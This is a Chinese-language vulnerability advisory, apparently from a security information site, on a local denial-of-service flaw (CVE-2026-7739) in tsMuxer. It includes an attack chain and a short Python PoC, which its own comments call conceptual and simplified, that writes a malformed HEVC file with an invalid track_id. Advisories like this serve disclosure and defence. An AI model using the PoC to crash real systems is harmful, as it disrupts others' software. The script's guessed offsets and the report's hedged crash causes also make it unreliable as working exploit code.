IPBUF安全漏洞报告
English
CVE-2026-7739 CVSS 3.3 低危

CVE-2026-7739 tsMuxer拒绝服务漏洞

披露日期: 2026-05-04
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7739
漏洞类型
拒绝服务
CVSS评分
3.3 低危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
tsMuxer

相关标签

拒绝服务DoStsMuxer本地漏洞内存破坏EOL

漏洞概述

tsMuxer 2.7.0及之前版本中存在一个安全漏洞,该漏洞源于`hevc.cpp`文件中的`HevcVpsUnit::setFPS`函数未能正确处理`track_id`参数。攻击者利用此漏洞可以通过本地访问并操纵特定参数,导致应用程序崩溃或停止响应,从而造成拒绝服务。鉴于该产品已不再受维护,官方可能不会发布修复补丁,且目前公开的利用代码增加了被攻击的风险。

技术细节

该漏洞存在于justdan96 tsMuxer的HEVC视频流处理模块中,具体路径为`/AFLplusplus/tsMuxer_prev/tsMuxer/hevc.cpp`。在`HevcVpsUnit::setFPS`函数执行过程中,程序未对传入的`track_id`参数进行充分的边界检查或有效性验证。攻击者可构造包含恶意数据的媒体文件,诱导本地用户使用受影响的tsMuxer版本进行处理。当解析到畸形数据时,逻辑错误可能引发空指针引用、缓冲区溢出或内存访问违例。根据CVSS向量(AV:L/AC:L/PR:L/UI:N/S:U),攻击需要本地访问权限和低权限用户级别,无需用户交互即可触发,主要影响系统的可用性(A:L),对机密性和完整性无直接影响。

攻击链分析

STEP 1
1. 信息收集
攻击者确认目标系统上安装了受影响的tsMuxer版本(<= 2.7.0)。
STEP 2
2. 构造载荷
攻击者利用公开信息或逆向工程,构造包含恶意`track_id`参数的媒体文件。
STEP 3
3. 投递载荷
将恶意文件传输到目标系统的本地存储中,或诱导具有本地访问权限的用户下载该文件。
STEP 4
4. 触发漏洞
本地用户或进程使用tsMuxer处理该恶意文件,触发`HevcVpsUnit::setFPS`函数中的逻辑错误。
STEP 5
5. 达成效果
tsMuxer进程崩溃,导致服务拒绝。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-7739 (Conceptual) # This script generates a crafted media file to trigger the DoS in tsMuxer. # Note: Actual exploitation requires a specific binary structure. import struct def create_exploit_file(filename): with open(filename, 'wb') as f: # Write a minimal container header (simplified for example) f.write(b'\x00\x00\x00\x01') # Start code # Write NALU header f.write(b'\x40\x01') # VPS NALU type # Write VPS data with manipulated track_id causing the crash in setFPS # The specific offset for track_id needs to match the vulnerable logic. # Here we inject a large integer or invalid value at the expected position. malformed_track_id = struct.pack('<I', 0xFFFFFFFF) # Append payload (Simulated) f.write(b'\x00\x00\x00\x01') f.write(malformed_track_id) f.write(b'A' * 100) # Padding print(f"[+] Exploit file generated: {filename}") print(f"[+] Run tsMuxer on this file to trigger the DoS.") if __name__ == "__main__": create_exploit_file("crash.ts")

影响范围

justdan96 tsMuxer <= 2.7.0

防御指南

临时缓解措施
由于官方不再维护该软件,无法通过打补丁修复此漏洞。建议用户立即卸载受影响的版本,并寻找替代软件(如FFmpeg等)。如果必须继续使用,应确保仅在受信任的本地环境中运行,并避免处理来源不明的媒体文件。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表